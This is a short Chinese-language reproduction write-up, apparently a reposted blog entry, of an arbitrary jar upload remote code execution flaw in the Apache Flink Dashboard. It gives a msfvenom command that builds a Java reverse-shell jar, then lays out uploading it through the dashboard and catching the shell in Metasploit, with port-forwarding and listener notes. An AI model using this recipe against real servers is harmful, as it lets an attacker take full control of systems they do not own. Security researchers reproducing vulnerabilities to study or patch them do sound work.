Apache Flink Dashboard 任意jar包上傳 Rce復現


0X01.漏洞原理

攻擊者可利用該漏洞在 Apache Flink Dashboard頁面中上傳任意Jar包,利用Metasploit在Apache Flink服務器中執行任意代碼,獲取服務器最高權限,所以危害性較大。

0X02.漏洞復現

需要生成一個公網的IP地址exploit才能正常接收到msf反射的shell通道。使用端口轉發工具在內網與公網之間形成映射

有了公網IP,現在可以用這個POC生成Jar包

msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar

上傳jar包后,在msfexploit中Set LHOST,SET PORT后,點擊submit

成功監聽。執行任意LINUX命令

POC中的Lhost,LPort 為公網IP與端口。

MsfExploit中的Lhost Lport為Localhost和與公網端口有映射關系的的本地監聽端口。

0X03.一些問題

1.使用NC監聽失敗,原因未知,msfexploit正常
2.下次嘗試使用端口轉發工具反彈shell


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM